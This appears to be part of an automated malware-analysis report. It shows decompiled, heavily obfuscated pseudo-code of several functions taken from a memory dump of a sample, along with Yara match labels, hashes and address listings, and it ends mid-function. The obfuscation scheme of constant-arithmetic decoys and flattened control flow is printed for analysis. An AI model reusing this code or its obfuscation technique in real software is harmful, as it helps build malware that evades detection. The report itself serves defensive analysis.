                          0x01229079
                          0x01229079
                          0x01228f34
                          0x01229012
                          0x01229025
                          0x0122902a
                          0x0122902d
                          0x01229034
                          0x0122903b
                          0x01229042
                          0x01229049
                          0x00000000
                          0x01228f3a
                          0x01228f40
                          0x01228fd4
                          0x01228fdd
                          0x01228fe0
                          0x01228fe3
                          0x01228fe6
                          0x01228feb
                          0x01228ff0
                          0x01228ff0
                          0x01228ffb
                          0x01229069
                          0x01228ffd
                          0x01228ffd
                          0x00000000
                          0x01228ffd
                          0x01228f46
                          0x01228f4c
                          0x01228fa5
                          0x01228fb5
                          0x01228fca
                          0x01228fd0
                          0x01229050
                          0x01229050
                          0x00000000
                          0x01228f4e
                          0x01228f50
                          0x00000000
                          0x01228f56
                          0x01228f61
                          0x01228f64
                          0x01228f69
                          0x01228f74
                          0x01228f75
                          0x01228f77
                          0x01228f84
                          0x01228f89
                          0x01228f8c
                          0x01228da3
                          0x01228da3
                          0x01228da3
                          0x00000000
                          0x01228da3
                          0x01228da3
                          0x01228f50
                          0x01228f4c
                          0x01228f40
                          0x00000000
                          0x01229055
                          0x01229055
                          0x00000000
                          0x01229061

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: R$ 0y\$/~$To[$X($ZkF{sz${sz
                          • API String ID: 0-4201736015
                          • Opcode ID: 0a2dc5f4941f7844cb62d31bbd0b8833437716e65562a790041f63578e18b75b
                          • Instruction ID: 747069ccb04c3a23205fcb23c01093b803d2565e17577ad53cd6981a9b0aab23
                          • Opcode Fuzzy Hash: 0a2dc5f4941f7844cb62d31bbd0b8833437716e65562a790041f63578e18b75b
                          • Instruction Fuzzy Hash: 87F142711183819FD368CF25C989A6FBBE1FBD4748F10891DF69A86260E7B5C909CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01219824, Relevance: 9.0, Strings: 7, Instructions: 297COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E01219824() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t327;
				intOrPtr _t341;
				intOrPtr _t347;
				void* _t349;
				void* _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t362;
				intOrPtr _t383;
				void* _t389;
				signed int* _t393;

				_t393 =  &_v152;
				_v16 = 0xf4fcbc;
				_v12 = 0xcc564a;
				_v8 = 0x1f44a7;
				_t350 = 0;
				_v4 = _v4 & 0;
				_v92 = 0xcfd7c7;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 + 0xd422;
				_v92 = _v92 ^ 0x0000ee1c;
				_v64 = 0xd22180;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x001a4430;
				_v60 = 0x8c1bcb;
				_v60 = _v60 * 0x39;
				_t389 = 0xd6d27c9;
				_v60 = _v60 ^ 0x1f323033;
				_v76 = 0x831fd4;
				_v76 = _v76 ^ 0x625d9212;
				_v76 = _v76 ^ 0xfff94b8d;
				_v76 = _v76 ^ 0x9d27c64b;
				_v104 = 0x10f543;
				_v104 = _v104 >> 5;
				_t352 = 3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 << 1;
				_v104 = _v104 ^ 0x0076b4c0;
				_v36 = 0x4f3c88;
				_v36 = _v36 + 0x5323;
				_v36 = _v36 ^ 0x00472983;
				_v132 = 0x249af3;
				_v132 = _v132 << 3;
				_v132 = _v132 + 0xdef7;
				_v132 = _v132 | 0x4837824b;
				_v132 = _v132 ^ 0x4938a10b;
				_v116 = 0xde336f;
				_v116 = _v116 * 0x70;
				_v116 = _v116 | 0xaff76fdf;
				_v116 = _v116 ^ 0xefff5053;
				_v140 = 0x39e387;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 | 0xd61d8ff0;
				_v140 = _v140 ^ 0xd8d48533;
				_v140 = _v140 ^ 0x0ec650e8;
				_v84 = 0xda673a;
				_v84 = _v84 + 0x3bc2;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xa8bcb544;
				_v52 = 0x79987e;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x07920e98;
				_v124 = 0xdab89c;
				_v124 = _v124 | 0x1f64e44b;
				_v124 = _v124 / _t352;
				_v124 = _v124 << 0xf;
				_v124 = _v124 ^ 0x2a2a3320;
				_v100 = 0x2e8e64;
				_v100 = _v100 + 0x279a;
				_v100 = _v100 ^ 0xd910bf7a;
				_v100 = _v100 + 0xffff7792;
				_v100 = _v100 ^ 0xd93d7a92;
				_v44 = 0x33eb7f;
				_v44 = _v44 | 0xf0ae93ea;
				_v44 = _v44 ^ 0xf0b1ffc7;
				_v152 = 0x6a71c3;
				_v152 = _v152 | 0xae1ef1ad;
				_v152 = _v152 ^ 0xf2a50ead;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xbff88a5a;
				_v68 = 0x3e4fcd;
				_v68 = _v68 + 0x6663;
				_v68 = _v68 ^ 0x0038ecf3;
				_v144 = 0xe881f;
				_t353 = 0x52;
				_v144 = _v144 / _t353;
				_t354 = 0x4c;
				_v144 = _v144 / _t354;
				_v144 = _v144 + 0xffff1bf7;
				_v144 = _v144 ^ 0xfff8babb;
				_v88 = 0x223694;
				_t355 = 0x75;
				_v88 = _v88 / _t355;
				_v88 = _v88 + 0x5d24;
				_v88 = _v88 ^ 0x0009c7d6;
				_v28 = 0xebbf2f;
				_v28 = _v28 + 0xffffaf63;
				_v28 = _v28 ^ 0x00ebd29d;
				_v80 = 0xc812ab;
				_v80 = _v80 + 0x96d7;
				_v80 = _v80 + 0xb4af;
				_v80 = _v80 ^ 0x00c2fb9a;
				_v48 = 0x7ee6e7;
				_t163 =  &_v48; // 0x7ee6e7
				_t356 = 0xa;
				_v48 =  *_t163 / _t356;
				_v48 = _v48 ^ 0x000128bb;
				_v136 = 0x4d965e;
				_v136 = _v136 + 0x947e;
				_v136 = _v136 + 0xffff529d;
				_v136 = _v136 ^ 0x66eabf86;
				_v136 = _v136 ^ 0x66adda57;
				_v56 = 0x578cb6;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x0aff5890;
				_v108 = 0x878f63;
				_v108 = _v108 << 5;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 + 0x9435;
				_v108 = _v108 ^ 0x00053dff;
				_v24 = 0xa0bcae;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x82ff4e2b;
				_v148 = 0xc81f08;
				_v148 = _v148 + 0xffff6414;
				_v148 = _v148 + 0xffffeb30;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 ^ 0x000c00be;
				_v96 = 0xf9f6b6;
				_v96 = _v96 << 0x10;
				_t357 = 0x4e;
				_v96 = _v96 * 0x2f;
				_v96 = _v96 ^ 0x3ff93bc2;
				_v96 = _v96 ^ 0x749da751;
				_v112 = 0x4ecc95;
				_v112 = _v112 | 0x05338e70;
				_v112 = _v112 + 0xe97c;
				_v112 = _v112 / _t357;
				_v112 = _v112 ^ 0x00151d97;
				_v120 = 0x5164d3;
				_v120 = _v120 + 0xa9f0;
				_v120 = _v120 + 0x9c4e;
				_v120 = _v120 + 0x4dd;
				_v120 = _v120 ^ 0x005479ba;
				_v128 = 0x513b04;
				_v128 = _v128 + 0xc212;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x3f5d72dd;
				_v128 = _v128 ^ 0x78a227d4;
				_v72 = 0x8b60f0;
				_v72 = _v72 << 6;
				_v72 = _v72 ^ 0x12fa78bf;
				_v72 = _v72 ^ 0x302b6153;
				_v32 = 0x8c29a0;
				_v32 = _v32 + 0x4cb4;
				_v32 = _v32 ^ 0x00871061;
				_v40 = 0x7031aa;
				_v40 = _v40 ^ 0x8728ba02;
				_v40 = _v40 ^ 0x875a71ec;
				while(1) {
					L1:
					while(1) {
						_t327 = 0xe709152;
						do {
							L3:
							if(_t389 == 0x57bf409) {
								E0121AE43( *((intOrPtr*)( *0x1235210 + 0x10)), _v128, _v72);
								E0121AE43( *0x1235210, _v32, _v40);
								_pop(_t362);
								_t389 = 0x64a8bf2;
								L14:
								_t383 =  *0x1235210;
								_t327 = 0xe709152;
								goto L15;
							}
							if(_t389 == 0xace7a45) {
								E01224827(_v20, _v96, _v104, _v112, _v120);
								L18:
								return _t350;
							}
							if(_t389 == 0xb56e1a5) {
								_push(_v68);
								_push(_v152);
								__eflags = E0122D96C(_v144, _v88,  &_v20, _v92, _v28, 0, E0122CD35(0x12115e8, _v44, __eflags)) - _v64;
								_t362 = _v80;
								_t389 =  ==  ? 0xe709152 : 0x57bf409;
								E0122629F(_t362, _t332, _v48, _v136, _v56);
								_t393 =  &(_t393[0xa]);
								goto L14;
							}
							if(_t389 == 0xd6d27c9) {
								_push(_t362);
								_push(_t362);
								_t341 = E01225212(0x2c);
								 *0x1235210 = _t341;
								 *((intOrPtr*)(_t341 + 0x14)) = 0x4000;
								_t347 = E01225212( *((intOrPtr*)( *0x1235210 + 0x14)));
								_t383 =  *0x1235210;
								_t393 =  &(_t393[4]);
								_t389 = 0xb56e1a5;
								_t362 =  *((intOrPtr*)(_t383 + 0x14)) + _t347;
								 *((intOrPtr*)(_t383 + 0x10)) = _t347;
								 *((intOrPtr*)(_t383 + 8)) = _t347;
								 *((intOrPtr*)(_t383 + 0x28)) = _t347;
								 *(_t383 + 0x24) = _t362;
								_t327 = 0xe709152;
								continue;
							}
							if(_t389 != _t327) {
								goto L15;
							}
							_t362 = _v60;
							_t349 = E012207D9(_t362, _v20,  *((intOrPtr*)( *0x1235210 + 0x10)), _v108, _v24, _v148,  *((intOrPtr*)(_t383 + 0x14)));
							_t393 =  &(_t393[5]);
							if(_t349 != _v76) {
								_t389 = 0x57bf409;
							} else {
								_t389 = 0xace7a45;
								_t350 = 1;
							}
							goto L1;
							L15:
							__eflags = _t389 - 0x64a8bf2;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}
























































                          0x01219824
                          0x0121982a
                          0x01219837
                          0x01219842
                          0x0121984e
                          0x01219850
                          0x01219857
                          0x0121985f
                          0x01219864
                          0x0121986c
                          0x01219874
                          0x0121987c
                          0x01219881
                          0x01219889
                          0x0121989b
                          0x0121989f
                          0x012198a4
                          0x012198ac
                          0x012198b4
                          0x012198bc
                          0x012198c4
                          0x012198cc
                          0x012198d4
                          0x012198de
                          0x012198df
                          0x012198e3
                          0x012198e7
                          0x012198ef
                          0x012198fa
                          0x01219905
                          0x01219910
                          0x01219918
                          0x0121991d
                          0x01219925
                          0x0121992d
                          0x01219935
                          0x01219942
                          0x01219946
                          0x0121994e
                          0x01219956
                          0x0121995e
                          0x01219963
                          0x0121996b
                          0x01219973
                          0x0121997b
                          0x01219983
                          0x0121998b
                          0x01219990
                          0x01219998
                          0x012199a0
                          0x012199a5
                          0x012199ad
                          0x012199b5
                          0x012199c3
                          0x012199c7
                          0x012199cc
                          0x012199d4
                          0x012199dc
                          0x012199e4
                          0x012199ec
                          0x012199f4
                          0x012199fc
                          0x01219a04
                          0x01219a0c
                          0x01219a14
                          0x01219a1c
                          0x01219a24
                          0x01219a2c
                          0x01219a31
                          0x01219a39
                          0x01219a41
                          0x01219a49
                          0x01219a53
                          0x01219a61
                          0x01219a66
                          0x01219a70
                          0x01219a75
                          0x01219a7b
                          0x01219a83
                          0x01219a8b
                          0x01219a97
                          0x01219a9c
                          0x01219aa2
                          0x01219aaa
                          0x01219ab2
                          0x01219abd
                          0x01219ac8
                          0x01219ad3
                          0x01219adb
                          0x01219ae3
                          0x01219aeb
                          0x01219af3
                          0x01219afb
                          0x01219aff
                          0x01219b04
                          0x01219b0a
                          0x01219b12
                          0x01219b1a
                          0x01219b22
                          0x01219b2a
                          0x01219b32
                          0x01219b3a
                          0x01219b42
                          0x01219b47
                          0x01219b4f
                          0x01219b57
                          0x01219b5c
                          0x01219b61
                          0x01219b69
                          0x01219b71
                          0x01219b7c
                          0x01219b84
                          0x01219b8f
                          0x01219b97
                          0x01219b9f
                          0x01219ba7
                          0x01219bac
                          0x01219bb4
                          0x01219bbc
                          0x01219bc6
                          0x01219bc7
                          0x01219bcb
                          0x01219bd3
                          0x01219bdb
                          0x01219be3
                          0x01219beb
                          0x01219bf9
                          0x01219bfd
                          0x01219c05
                          0x01219c0d
                          0x01219c15
                          0x01219c1d
                          0x01219c25
                          0x01219c32
                          0x01219c3a
                          0x01219c42
                          0x01219c47
                          0x01219c4f
                          0x01219c57
                          0x01219c5f
                          0x01219c64
                          0x01219c6c
                          0x01219c74
                          0x01219c7f
                          0x01219c8a
                          0x01219c95
                          0x01219ca0
                          0x01219cab
                          0x01219cb6
                          0x01219cb6
                          0x01219cbc
                          0x01219cbc
                          0x01219cc1
                          0x01219cc1
                          0x01219cc3
                          0x01219e25
                          0x01219e3e
                          0x01219e44
                          0x01219e45
                          0x01219e4a
                          0x01219e4a
                          0x01219e50
                          0x00000000
                          0x01219e50
                          0x01219ccf
                          0x01219e7a
                          0x01219e85
                          0x01219e8e
                          0x01219e8e
                          0x01219cdb
                          0x01219d9e
                          0x01219da7
                          0x01219dec
                          0x01219e00
                          0x01219e07
                          0x01219e0a
                          0x01219e0f
                          0x00000000
                          0x01219e0f
                          0x01219ce7
                          0x01219d45
                          0x01219d46
                          0x01219d49
                          0x01219d4e
                          0x01219d56
                          0x01219d75
                          0x01219d7a
                          0x01219d80
                          0x01219d83
                          0x01219d8b
                          0x01219d8d
                          0x01219d90
                          0x01219d93
                          0x01219d96
                          0x01219cbc
                          0x00000000
                          0x01219cbc
                          0x01219ceb
                          0x00000000
                          0x00000000
                          0x01219d08
                          0x01219d16
                          0x01219d1b
                          0x01219d22
                          0x01219d2e
                          0x01219d24
                          0x01219d26
                          0x01219d2b
                          0x01219d2b
                          0x00000000
                          0x01219e55
                          0x01219e55
                          0x01219e55
                          0x00000000
                          0x01219e61
                          0x01219cbc

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3**$#S$$]$Sa+0$cf$|$~
                          • API String ID: 0-2081237789
                          • Opcode ID: 9dc7082c8d62a62b208186fb4392fe41a193665477a733844eb6bee81747a46f
                          • Instruction ID: bd1a9d1992fa6a117e2308da4e2814620b1b9981e523100db28d417b9833c503
                          • Opcode Fuzzy Hash: 9dc7082c8d62a62b208186fb4392fe41a193665477a733844eb6bee81747a46f
                          • Instruction Fuzzy Hash: 7EF110B15193809FD7A4CF25C58AA0BBBF1FBD4708F108A1CF29A86264D7B5C949CF46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01223043, Relevance: 9.0, Strings: 7, Instructions: 281COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E01223043() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				unsigned int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t313;
				void* _t319;
				short* _t321;
				void* _t329;
				void* _t332;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int* _t369;

				_t369 =  &_v1164;
				_v1048 = 0x2d3a44;
				_v1048 = _v1048 + 0xffff0941;
				_t329 = 0x186cafe;
				_v1048 = _v1048 ^ 0x00270cf9;
				_v1144 = 0xb1e5f6;
				_v1144 = _v1144 << 0xe;
				_v1144 = _v1144 << 7;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 ^ 0x002b5059;
				_v1152 = 0x705433;
				_t16 =  &_v1152; // 0x705433
				_v1152 =  *_t16 * 0x2c;
				_v1152 = _v1152 << 0xa;
				_t361 = 0x6c;
				_v1152 = _v1152 / _t361;
				_v1152 = _v1152 ^ 0x008cb6ab;
				_v1056 = 0xd48a8d;
				_t362 = 0x3d;
				_v1056 = _v1056 * 0x52;
				_v1056 = _v1056 ^ 0x44188b10;
				_v1148 = 0xe8a1a4;
				_v1148 = _v1148 + 0xffff8445;
				_v1148 = _v1148 | 0x150de577;
				_v1148 = _v1148 ^ 0x15ecbdc8;
				_v1124 = 0x50c1ed;
				_v1124 = _v1124 | 0x9ced1bc9;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 | 0xa10f3434;
				_v1124 = _v1124 ^ 0xa10cf900;
				_v1132 = 0xd65ea8;
				_v1132 = _v1132 / _t362;
				_v1132 = _v1132 << 0xc;
				_v1132 = _v1132 + 0xffffd745;
				_v1132 = _v1132 ^ 0x383476ea;
				_v1092 = 0x7d248b;
				_v1092 = _v1092 + 0x3adc;
				_v1092 = _v1092 | 0x1757e69d;
				_v1092 = _v1092 ^ 0x177f08c2;
				_v1100 = 0x68c52b;
				_v1100 = _v1100 << 0xd;
				_v1100 = _v1100 + 0xffff6c94;
				_v1100 = _v1100 ^ 0x18a2cc44;
				_v1108 = 0xf64a56;
				_v1108 = _v1108 >> 4;
				_v1108 = _v1108 * 0x7f;
				_v1108 = _v1108 ^ 0x07a4a319;
				_v1116 = 0xd81790;
				_v1116 = _v1116 * 0x43;
				_v1116 = _v1116 * 0x58;
				_v1116 = _v1116 ^ 0x70d3674e;
				_v1084 = 0xe6426f;
				_v1084 = _v1084 << 0xe;
				_v1084 = _v1084 | 0xd1d471be;
				_v1084 = _v1084 ^ 0xd1dea415;
				_v1076 = 0x8c6f58;
				_v1076 = _v1076 | 0x991e36bf;
				_v1076 = _v1076 ^ 0x99977486;
				_v1160 = 0x236549;
				_v1160 = _v1160 ^ 0x427975cb;
				_v1160 = _v1160 + 0x3095;
				_v1160 = _v1160 >> 4;
				_v1160 = _v1160 ^ 0x042dc73f;
				_v1164 = 0xfebce3;
				_v1164 = _v1164 >> 0xf;
				_v1164 = _v1164 >> 7;
				_t363 = 0x1e;
				_v1164 = _v1164 / _t363;
				_v1164 = _v1164 ^ 0x000c9c1e;
				_v1080 = 0x5349f6;
				_v1080 = _v1080 << 0xf;
				_v1080 = _v1080 ^ 0xa4f9f85e;
				_v1140 = 0x26cb2a;
				_t364 = 0x15;
				_v1140 = _v1140 * 0x24;
				_v1140 = _v1140 | 0x0de1b006;
				_v1140 = _v1140 ^ 0xe7339f4d;
				_v1140 = _v1140 ^ 0xeac16655;
				_v1112 = 0x9852f8;
				_v1112 = _v1112 + 0x72cd;
				_v1112 = _v1112 * 0x14;
				_v1112 = _v1112 ^ 0x0bea8297;
				_v1072 = 0xdc0abc;
				_v1072 = _v1072 ^ 0x7308e6d0;
				_v1072 = _v1072 ^ 0x73d1aa5a;
				_v1088 = 0x8fedd;
				_v1088 = _v1088 ^ 0x69cb2d45;
				_v1088 = _v1088 << 1;
				_v1088 = _v1088 ^ 0xd38c1690;
				_v1104 = 0xaf7f4d;
				_v1104 = _v1104 ^ 0x9cac2162;
				_v1104 = _v1104 / _t364;
				_v1104 = _v1104 ^ 0x076c0045;
				_v1044 = 0x538525;
				_v1044 = _v1044 << 9;
				_v1044 = _v1044 ^ 0xa7034723;
				_v1096 = 0xea9b15;
				_t365 = 0x4b;
				_v1096 = _v1096 * 0x60;
				_v1096 = _v1096 ^ 0x235e7f1a;
				_v1096 = _v1096 ^ 0x74af7ddb;
				_v1064 = 0xdeb775;
				_v1064 = _v1064 >> 0xf;
				_v1064 = _v1064 ^ 0x0008978c;
				_v1156 = 0x6783c9;
				_v1156 = _v1156 * 0x36;
				_v1156 = _v1156 >> 0xf;
				_v1156 = _v1156 >> 1;
				_v1156 = _v1156 ^ 0x0003dd71;
				_v1060 = 0xb82108;
				_v1060 = _v1060 >> 9;
				_v1060 = _v1060 ^ 0x0000ce5f;
				_v1068 = 0x376109;
				_v1068 = _v1068 + 0xffffb593;
				_v1068 = _v1068 ^ 0x00346b58;
				_v1136 = 0xb96fb1;
				_v1136 = _v1136 << 0x10;
				_v1136 = _v1136 / _t365;
				_v1136 = _v1136 | 0x4a356d96;
				_v1136 = _v1136 ^ 0x4b71a912;
				_v1120 = 0x2830ef;
				_t220 =  &_v1120; // 0x2830ef
				_t366 = 0x43;
				_v1120 =  *_t220 * 0x5a;
				_v1120 = _v1120 >> 0xc;
				_v1120 = _v1120 / _t366;
				_v1120 = _v1120 ^ 0x000d571a;
				_v1052 = 0xc9677a;
				_v1052 = _v1052 << 0xd;
				_v1052 = _v1052 ^ 0x2ceb6ba4;
				_v1128 = 0x31f152;
				_v1128 = _v1128 + 0xae1c;
				_v1128 = _v1128 + 0xffff0313;
				_v1128 = _v1128 + 0xffff1566;
				_v1128 = _v1128 ^ 0x003472f6;
				do {
					while(_t329 != 0x186cafe) {
						if(_t329 == 0x4a9d402) {
							E01217795();
							L9:
							_t329 = 0xa86fb5e;
							continue;
						}
						if(_t329 == 0xa86fb5e) {
							_push(_v1124);
							_push(_v1148);
							_t313 = E0122CD35(0x1211000, _v1056, __eflags);
							_pop(_t332);
							E01222EA5( *0x1235218 + 0x234, __eflags,  *0x1235218 + 0x18, _t332, _v1092, _v1100, _t313, _v1108, _v1116,  &_v520);
							E0122629F(_v1084, _t313, _v1076, _v1160, _v1164);
							_t369 =  &(_t369[0xb]);
							_t329 = 0xdf279c5;
							continue;
						}
						if(_t329 == 0xad35f7f) {
							_t319 = E012252D1();
							goto L9;
						}
						if(_t329 == 0xc062218) {
							_t321 = E01212B69(_v1060, _v1068,  &_v520, _v1136);
							__eflags = 0;
							 *_t321 = 0;
							return E01214025(_v1120,  &_v520, _v1052, _v1128);
						}
						_t378 = _t329 - 0xdf279c5;
						if(_t329 != 0xdf279c5) {
							goto L15;
						}
						E0122D5C5(_t329, _v1080,  &_v1040, _v1140, _v1112, _v1072);
						E012139C5(_t329, _v1088, _v1104,  &_v1040, _v1044, _v1096,  &_v1040);
						_push(_v1156);
						_push( &_v520);
						_t319 = E01229124(_v1064,  &_v1040, _t378);
						_t369 =  &(_t369[0xb]);
						_t329 = 0xc062218;
					}
					__eflags =  *((intOrPtr*)( *0x1235218 + 0x43c));
					if(__eflags == 0) {
						_t329 = 0x4a9d402;
						goto L15;
					}
					_t329 = 0xad35f7f;
					continue;
					L15:
					__eflags = _t329 - 0x4ea2fc0;
				} while (__eflags != 0);
				return _t319;
			}
















































                          0x01223043
                          0x01223049
                          0x01223053
                          0x0122305b
                          0x01223060
                          0x01223068
                          0x01223070
                          0x01223075
                          0x0122307a
                          0x0122307f
                          0x01223087
                          0x0122308f
                          0x01223098
                          0x0122309c
                          0x012230a7
                          0x012230ac
                          0x012230b2
                          0x012230ba
                          0x012230cd
                          0x012230ce
                          0x012230d2
                          0x012230da
                          0x012230ea
                          0x012230f2
                          0x012230fa
                          0x01223102
                          0x0122310a
                          0x01223112
                          0x01223117
                          0x0122311f
                          0x01223127
                          0x01223135
                          0x01223139
                          0x0122313e
                          0x01223146
                          0x0122314e
                          0x01223156
                          0x0122315e
                          0x01223166
                          0x0122316e
                          0x01223176
                          0x0122317b
                          0x01223183
                          0x0122318b
                          0x01223193
                          0x0122319d
                          0x012231a1
                          0x012231a9
                          0x012231b6
                          0x012231bf
                          0x012231c3
                          0x012231cb
                          0x012231d3
                          0x012231d8
                          0x012231e0
                          0x012231e8
                          0x012231f0
                          0x012231f8
                          0x01223200
                          0x01223208
                          0x01223210
                          0x01223218
                          0x0122321d
                          0x01223225
                          0x0122322d
                          0x01223234
                          0x0122323f
                          0x01223244
                          0x0122324a
                          0x01223252
                          0x0122325a
                          0x0122325f
                          0x01223267
                          0x01223274
                          0x01223277
                          0x0122327b
                          0x01223283
                          0x0122328b
                          0x01223293
                          0x0122329b
                          0x012232a8
                          0x012232ac
                          0x012232b4
                          0x012232bc
                          0x012232c4
                          0x012232cc
                          0x012232d4
                          0x012232dc
                          0x012232e0
                          0x012232e8
                          0x012232f0
                          0x01223300
                          0x01223304
                          0x0122330c
                          0x01223317
                          0x0122331f
                          0x0122332a
                          0x01223337
                          0x0122333a
                          0x0122333e
                          0x01223346
                          0x0122334e
                          0x01223356
                          0x0122335b
                          0x01223363
                          0x01223370
                          0x01223374
                          0x01223379
                          0x0122337d
                          0x01223385
                          0x0122338d
                          0x01223392
                          0x0122339a
                          0x012233a2
                          0x012233aa
                          0x012233b2
                          0x012233ba
                          0x012233c7
                          0x012233cb
                          0x012233d3
                          0x012233db
                          0x012233e3
                          0x012233e8
                          0x012233e9
                          0x012233ed
                          0x012233f8
                          0x01223401
                          0x0122340e
                          0x0122341e
                          0x01223426
                          0x01223431
                          0x01223439
                          0x01223441
                          0x01223449
                          0x01223451
                          0x01223459
                          0x01223459
                          0x01223467
                          0x01223597
                          0x0122350e
                          0x0122350e
                          0x00000000
                          0x0122350e
                          0x0122346f
                          0x01223515
                          0x0122351e
                          0x01223529
                          0x0122352f
                          0x01223560
                          0x0122357d
                          0x01223582
                          0x01223585
                          0x00000000
                          0x01223585
                          0x01223477
                          0x01223509
                          0x00000000
                          0x01223509
                          0x01223483
                          0x012235da
                          0x012235e3
                          0x012235f3
                          0x00000000
                          0x012235ff
                          0x01223489
                          0x0122348f
                          0x00000000
                          0x00000000
                          0x012234ad
                          0x012234d1
                          0x012234d6
                          0x012234e8
                          0x012234f0
                          0x012234f5
                          0x012234f8
                          0x012234f8
                          0x012235a6
                          0x012235ad
                          0x012235b6
                          0x00000000
                          0x012235b6
                          0x012235af
                          0x00000000
                          0x012235b8
                          0x012235b8
                          0x012235b8
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3Tp$E$Ie#$Xk4$oB$0($v48
                          • API String ID: 0-724312824
                          • Opcode ID: 307bbf447f3b108b77ff5ddd3aac3c77cff7637dbf65867ed9c381361f30f1ee
                          • Instruction ID: 3e677fee924c8a83db1b8778d531aecff726a8bcc240f42d86e662aa8ea96c1c
                          • Opcode Fuzzy Hash: 307bbf447f3b108b77ff5ddd3aac3c77cff7637dbf65867ed9c381361f30f1ee
                          • Instruction Fuzzy Hash: D6E11171118381AFD369CF25D48995FBBE1FBC4348F108A1DF2A686260D7B59949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012210CD, Relevance: 9.0, Strings: 7, Instructions: 246COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E012210CD() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t240;
				void* _t241;
				intOrPtr _t250;
				signed int _t253;
				void* _t256;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t286;
				signed int* _t288;
				void* _t291;

				_t288 =  &_v624;
				_v532 = 0xe57b87;
				_v532 = _v532 ^ 0x25168ae1;
				_t256 = 0x2f2f5f6;
				_v532 = _v532 ^ 0x25f3f17a;
				_v612 = 0xfe0f84;
				_t280 = 0x19;
				_v612 = _v612 / _t280;
				_v612 = _v612 + 0x2302;
				_t286 = 0;
				_v612 = _v612 + 0x80ef;
				_v612 = _v612 ^ 0x000acdac;
				_v580 = 0xda4e11;
				_v580 = _v580 + 0xffff50bf;
				_v580 = _v580 << 0xd;
				_v580 = _v580 ^ 0x33d5003f;
				_v572 = 0xe96466;
				_v572 = _v572 + 0xffff71ae;
				_v572 = _v572 + 0x4e4e;
				_v572 = _v572 ^ 0x00e0c677;
				_v588 = 0xa4980a;
				_t281 = 0x5d;
				_v588 = _v588 / _t281;
				_v588 = _v588 << 0xa;
				_v588 = _v588 ^ 0x0711cab5;
				_v556 = 0x65f7a4;
				_v556 = _v556 << 6;
				_v556 = _v556 ^ 0x1979ac6e;
				_v528 = 0x6debbf;
				_t282 = 0x56;
				_v528 = _v528 * 0x34;
				_v528 = _v528 ^ 0x16541216;
				_v564 = 0x4186bf;
				_v564 = _v564 >> 0xb;
				_v564 = _v564 ^ 0x0008323b;
				_v616 = 0x3750aa;
				_v616 = _v616 + 0xffffbcbe;
				_v616 = _v616 + 0xffff835a;
				_v616 = _v616 | 0x3cbb8257;
				_v616 = _v616 ^ 0x3cb4f187;
				_v624 = 0x17f460;
				_v624 = _v624 + 0xffffb19b;
